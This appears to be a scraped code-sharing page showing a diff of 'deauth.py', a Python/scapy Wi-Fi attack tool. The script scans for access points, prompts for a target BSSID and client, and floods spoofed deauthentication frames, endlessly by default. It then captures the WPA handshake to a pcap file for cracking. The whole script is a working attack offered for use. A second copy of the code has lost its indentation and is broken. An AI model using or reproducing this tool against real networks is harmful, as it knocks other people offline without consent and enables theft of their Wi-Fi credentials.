garyconstable · August 26, 2024 17:57 · devlocalhost · Aug 18, 2021 · devlocalhost · Aug 18, 2021
diff --git a/deauth.py b/deauth.py
 import argparse
 from multiprocessing import Process
 import logging
 logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 from scapy.all import *
 import signal
 import threading
 from sys import platform


 """
 OSX Devices
 networksetup -listallhardwareports
 """


 """
 Capture Hand Shake
 """
 class CaptureHandShake():
 	"""
 	Init
 	"""
 	def __init__(self, iface):
 		self.wpa_handshake = []
 		self.iface = iface
 		self.acceptAny = False
 		self.packetMax = 100
 		self.packetCount = 0


 	"""
 	Handle the packets
 	"""
 	def handle_packet(self, packet):

 		if self.acceptAny == True:
 			print packet.summary()
 			self.wpa_handshake.append(packet)
 			self.packetCount += 1

 			if self.packetCount == self.packetMax:
 				filename = "pcaps/wpa-handshake-" + str(datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")) + ".pcap"
 				wrpcap(filename, self.wpa_handshake)
 				self.wpa_handshake = []
 				self.acceptAny = False
 				self.packetCount = 0
 		else:
 			#got EAPOL KEY packet
 			if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
 				print packet.summary()
 				self.wpa_handshake.append(packet)

 			#if we have 4 packets
 			if len(self.wpa_handshake) >= 4:
 				self.acceptAny = True
 				print "\n"
 				print '='*100
 				print "\n"


 	"""
 	Start the sniffer
 	"""
 	def start(self):
 		os.system("clear")
 		print '='*100
 		print "Sniffing on interface: " + self.iface
 		print '='*100
 		sniff(iface=self.iface, prn=self.handle_packet)


 """
 Deauth Attack Class
 """
 class deauth:
 	"""
 	Deauth class constructor
 	"""
 	def __init__(self, interface):
 		self.interface = interface
 		self.networks = {}
 		self.stop_sniff = False
 		self.signal = signal
 		self.channel_hop = None
 		self.target_bssid = ""
 		self.interupted = False
 		self.listenKeyboard = None


 	"""
 	Turn on monitor mode
 	"""
 	def monitorMode(self):
 		os.system("ifconfig " + self.interface + " down")
 		os.system("iwconfig " + self.interface + " mode monitor")
 		os.system("ifconfig " + self.interface + " up")


 	"""
 	Start the network sniffer
 	"""
 	def start_sniffer(self):
 		os.system("clear")
 		print '='*100
 		print "\nPress CTRL+c to stop sniffing..\n"
 		print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
 		
 		channel_hop = Process(target = self.channel_hopper, args=(self.interface,))
    		channel_hop.start()

 		stopsniff = False
 		sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stopsniff, prn=lambda x: self.add_network(x) )

 		try:
 		    	while True:	
 				time.sleep(1)
 		except KeyboardInterrupt:
 			stopsniff = True



 	"""
 	Swicth wifi channels
 	"""
 	def channel_hopper(self, interface):
 		while True:
 			try:
 				channel = random.randrange(1,13)
 				os.system("iwconfig %s channel %d" % (interface, channel))
 				time.sleep(1)
 			except KeyboardInterrupt:
 				break


 	"""
 	Add a found network to the list
 	"""
 	def add_network(self, pckt):
 		essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
 		bssid = pckt[Dot11].addr3
 		channel = int(ord(pckt[Dot11Elt:3].info))
 		if bssid not in self.networks:
 			self.networks[bssid] = ( essid, channel )
 			print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)


 	"""
 	Stop hopping channels
 	"""
 	def stop_channel_hop(self, signal, frame):
 		self.stop_sniff = True
 		self.channel_hop.terminate()
 		self.channel_hop.join()


 	"""
 	Stop the niff
 	"""
 	def keep_sniffing(self, pckt):
 		return self.stop_sniff


 	"""
 	Send Deauth packets
 	"""
 	def perform_deauth(self, bssid, client, count):
 		pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
 		cli_to_ap_pckt = None
 		if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
 		print 'Sending Deauth to ' + client + ' from ' + bssid
 		if not count:
 			print 'Press CTRL+C to quit'
 		count = int(count)
 		while count != 0:
 			try:
 				for i in range(64):
 					# Send out deauth from the AP
 					send(pckt)
 					# If we're targeting a client, we will also spoof deauth from the client to the AP
 					if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
 				# If count was -1, this will be an infinite loop
 				count -= 1
 			except KeyboardInterrupt:
 				break


 	"""
 	Get the target to attack
 	"""
 	def getTarget(self):
 		print "\n\n"
 		print '='*100

 		target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
 		self.target_bssid = target_bssid

 		while target_bssid not in self.networks:
 			target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
 			self.target_bssid = target_bssid
 			if target_bssid == 'q':
 				sys.exit(0)

 		# Get our interface to the correct channel
 		print 'Changing ' + self.interface + ' to channel ' + str(self.networks[target_bssid][1])
 		os.system("iwconfig %s channel %d" % (self.interface, self.networks[target_bssid][1]))
 		print "\n\n"
 		print '='*100


 	"""
 	Loop for client packets on the selected channel
 	"""
 	def sniffClients(self):
 		interupted = False
 		try:
 			sniff(iface=self.interface, prn=self.getClients, stop_filter=interupted )
 			while True:
 	        		time.sleep(1)
 		except KeyboardInterrupt:
 			interupted = True


 	"""
 	Get the clients for the BSSID
 	"""
 	def getClients(self, pkt):
 		bssid = pkt[Dot11].addr3
 		target_bssid = self.target_bssid
 		if target_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
 			print pkt.summary()


 	"""
 	Packet Info
 	"""
 	def pktInfo(self, pkt):
 		bssid = pkt[Dot11].addr3
 		p = pkt[Dot11Elt]
 		cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}""{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
 		ssid, channel = None, None
 		crypto = set()
 		while isinstance(p, Dot11Elt):
 			if p.ID == 0:
 				ssid = p.info
 			elif p.ID == 3:
 				channel = ord(p.info)
 			elif p.ID == 48:
 				crypto.add("WPA2")
 			elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
 				crypto.add("WPA")
 			p = p.payload
 		if not crypto:
 			if 'privacy' in cap:
 				crypto.add("WEP")
 			else:
 				crypto.add("OPN")
 		print "    %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )


 	"""
 	Attack the target
 	"""
 	def attackTarget(self):
 		print "\n\n"
 		print '='*100
 		# Now we have a bssid that we have detected, let's get the client MAC
 		target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
 		if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
 		deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
 		print "\n\n"
 		print '='*100
 		if not deauth_pckt_count:
 			deauth_pckt_count = -1
 		self.perform_deauth(self.target_bssid, target_client, deauth_pckt_count)


 def main():
 	"""
 	Set the command line options
 	"""
 	parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
 	parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
 	parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')

 	"""
 	Get the command line options
 	"""
 	args = parser.parse_args()
 	conf.iface = args.iface

 	"""
 	Create the deauth class and begin the attack
 	"""
 	#create class instance
 	de = deauth(args.iface)

 	# if turn on monitor mode
 	if args.monitor != "" and args.monitor != None:
 		de.monitorMode()

 	#start the ssid sniffer
 	de.start_sniffer()

 	#choose target
 	de.getTarget()

 	#sniff for client mac's
 	de.sniffClients()

 	#attack the target
 	de.attackTarget()

 	#capture the handshake packets
 	sn = CaptureHandShake(args.iface)
 	sn.start()

 if __name__ == "__main__":
 	main()
	import argparse
	from multiprocessing import Process
	import logging
	logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
	from scapy.all import *
	import signal
	import threading
	from sys import platform


	"""
	OSX Devices
	networksetup -listallhardwareports
	"""


	"""
	Capture Hand Shake
	"""
	class CaptureHandShake():
	"""
	Init
	"""
	def __init__(self, iface):
	self.wpa_handshake = []
	self.iface = iface
	self.acceptAny = False
	self.packetMax = 100
	self.packetCount = 0


	"""
	Handle the packets
	"""
	def handle_packet(self, packet):

	if self.acceptAny == True:
	print packet.summary()
	self.wpa_handshake.append(packet)
	self.packetCount += 1

	if self.packetCount == self.packetMax:
	filename = "pcaps/wpa-handshake-" + str(datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")) + ".pcap"
	wrpcap(filename, self.wpa_handshake)
	self.wpa_handshake = []
	self.acceptAny = False
	self.packetCount = 0
	else:
	#got EAPOL KEY packet
	if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
	print packet.summary()
	self.wpa_handshake.append(packet)

	#if we have 4 packets
	if len(self.wpa_handshake) >= 4:
	self.acceptAny = True
	print "\n"
	print '='*100
	print "\n"


	"""
	Start the sniffer
	"""
	def start(self):
	os.system("clear")
	print '='*100
	print "Sniffing on interface: " + self.iface
	print '='*100
	sniff(iface=self.iface, prn=self.handle_packet)


	"""
	Deauth Attack Class
	"""
	class deauth:
	"""
	Deauth class constructor
	"""
	def __init__(self, interface):
	self.interface = interface
	self.networks = {}
	self.stop_sniff = False
	self.signal = signal
	self.channel_hop = None
	self.target_bssid = ""
	self.interupted = False
	self.listenKeyboard = None


	"""
	Turn on monitor mode
	"""
	def monitorMode(self):
	os.system("ifconfig " + self.interface + " down")
	os.system("iwconfig " + self.interface + " mode monitor")
	os.system("ifconfig " + self.interface + " up")


	"""
	Start the network sniffer
	"""
	def start_sniffer(self):
	os.system("clear")
	print '='*100
	print "\nPress CTRL+c to stop sniffing..\n"
	print '='100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='100

	channel_hop = Process(target = self.channel_hopper, args=(self.interface,))
	channel_hop.start()

	stopsniff = False
	sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stopsniff, prn=lambda x: self.add_network(x) )

	try:
	while True:
	time.sleep(1)
	except KeyboardInterrupt:
	stopsniff = True



	"""
	Swicth wifi channels
	"""
	def channel_hopper(self, interface):
	while True:
	try:
	channel = random.randrange(1,13)
	os.system("iwconfig %s channel %d" % (interface, channel))
	time.sleep(1)
	except KeyboardInterrupt:
	break


	"""
	Add a found network to the list
	"""
	def add_network(self, pckt):
	essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
	bssid = pckt[Dot11].addr3
	channel = int(ord(pckt[Dot11Elt:3].info))
	if bssid not in self.networks:
	self.networks[bssid] = ( essid, channel )
	print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)


	"""
	Stop hopping channels
	"""
	def stop_channel_hop(self, signal, frame):
	self.stop_sniff = True
	self.channel_hop.terminate()
	self.channel_hop.join()


	"""
	Stop the niff
	"""
	def keep_sniffing(self, pckt):
	return self.stop_sniff


	"""
	Send Deauth packets
	"""
	def perform_deauth(self, bssid, client, count):
	pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
	cli_to_ap_pckt = None
	if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
	print 'Sending Deauth to ' + client + ' from ' + bssid
	if not count:
	print 'Press CTRL+C to quit'
	count = int(count)
	while count != 0:
	try:
	for i in range(64):
	# Send out deauth from the AP
	send(pckt)
	# If we're targeting a client, we will also spoof deauth from the client to the AP
	if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
	# If count was -1, this will be an infinite loop
	count -= 1
	except KeyboardInterrupt:
	break


	"""
	Get the target to attack
	"""
	def getTarget(self):
	print "\n\n"
	print '='*100

	target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
	self.target_bssid = target_bssid

	while target_bssid not in self.networks:
	target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
	self.target_bssid = target_bssid
	if target_bssid == 'q':
	sys.exit(0)

	# Get our interface to the correct channel
	print 'Changing ' + self.interface + ' to channel ' + str(self.networks[target_bssid][1])
	os.system("iwconfig %s channel %d" % (self.interface, self.networks[target_bssid][1]))
	print "\n\n"
	print '='*100


	"""
	Loop for client packets on the selected channel
	"""
	def sniffClients(self):
	interupted = False
	try:
	sniff(iface=self.interface, prn=self.getClients, stop_filter=interupted )
	while True:
	time.sleep(1)
	except KeyboardInterrupt:
	interupted = True


	"""
	Get the clients for the BSSID
	"""
	def getClients(self, pkt):
	bssid = pkt[Dot11].addr3
	target_bssid = self.target_bssid
	if target_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
	print pkt.summary()


	"""
	Packet Info
	"""
	def pktInfo(self, pkt):
	bssid = pkt[Dot11].addr3
	p = pkt[Dot11Elt]
	cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}""{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
	ssid, channel = None, None
	crypto = set()
	while isinstance(p, Dot11Elt):
	if p.ID == 0:
	ssid = p.info
	elif p.ID == 3:
	channel = ord(p.info)
	elif p.ID == 48:
	crypto.add("WPA2")
	elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
	crypto.add("WPA")
	p = p.payload
	if not crypto:
	if 'privacy' in cap:
	crypto.add("WEP")
	else:
	crypto.add("OPN")
	print " %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )


	"""
	Attack the target
	"""
	def attackTarget(self):
	print "\n\n"
	print '='*100
	# Now we have a bssid that we have detected, let's get the client MAC
	target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
	if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
	deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
	print "\n\n"
	print '='*100
	if not deauth_pckt_count:
	deauth_pckt_count = -1
	self.perform_deauth(self.target_bssid, target_client, deauth_pckt_count)


	def main():
	"""
	Set the command line options
	"""
	parser = argparse.ArgumentParser( description='deauth.py - Perform a Deauth WIFI Attack - python deauth.py -i wlan0 -m 1')
	parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
	parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')

	"""
	Get the command line options
	"""
	args = parser.parse_args()
	conf.iface = args.iface

	"""
	Create the deauth class and begin the attack
	"""
	#create class instance
	de = deauth(args.iface)

	# if turn on monitor mode
	if args.monitor != "" and args.monitor != None:
	de.monitorMode()

	#start the ssid sniffer
	de.start_sniffer()

	#choose target
	de.getTarget()

	#sniff for client mac's
	de.sniffClients()

	#attack the target
	de.attackTarget()

	#capture the handshake packets
	sn = CaptureHandShake(args.iface)
	sn.start()

	if __name__ == "__main__":
	main()